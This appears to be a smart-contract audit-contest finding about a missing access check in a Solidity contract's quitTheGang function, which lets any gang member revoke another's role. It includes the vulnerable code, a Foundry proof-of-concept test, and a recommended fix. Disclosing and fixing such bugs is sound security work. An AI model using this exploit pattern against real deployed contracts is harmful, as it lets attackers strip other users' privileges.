Submission Details
Severity:
Any gang member can kick any other gang member by calling Laundrette.quitTheGang(Victim Address)
Description
Gang members can quit the gang if they choose to, using the function Laundrette::quitTheGang(address account). However, this function does not verify if the member who is quitting is the msg.sender, which allows any gang member to kick any other member from the gang.
Vulnerable Code
function quitTheGang(address account) external onlyRole("gangmember") {
kernel.revokeRole(Role.wrap("gangmember"), account);
}
Proof of Concept:
Here is a simple PoC that demonstrates vulnerability exploitation
//SPDX-Liecense-Identifier: MIT
import "./Base.t.sol";
contract AttackTest is BaseTest {
function test_GangMemberCanKickAnyOtherMebmer() public {
address alice = makeAddr("Alice");
address bob = makeAddr("Bob");
address godFather = kernel.executor();
vm.prank(kernel.admin());
kernel.grantRole(Role.wrap("gangmember"), godFather);
vm.startPrank(godFather);
laundrette.addToTheGang(alice);
laundrette.addToTheGang(bob);
vm.stopPrank();
vm.prank(alice);
laundrette.quitTheGang(bob);
vm.prank(bob);
vm.expectRevert();
laundrette.quitTheGang(bob);
}
}
Impact
any gangMember can kick the other gangMembers out of the gang
Tools Used
Foundry , Manual Review
Recommendations
Modify the function to include access control, so only the member themselves or the GodFather can revoke the access of the gang member.
- function quitTheGang(address account) external onlyRole("gangmember") {
+ function quitTheGang(address account) external onlyRole("gangmember") isAuthorizedOrRevert(account) {
kernel.revokeRole(Role.wrap("gangmember"), account);
}
Updates
Lead Judging Commences
n0kto over 1 year ago
Submission Judgement Published Assigned finding tags:
Gang members ban other members
Rewards breakdown
nSLOC
205This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.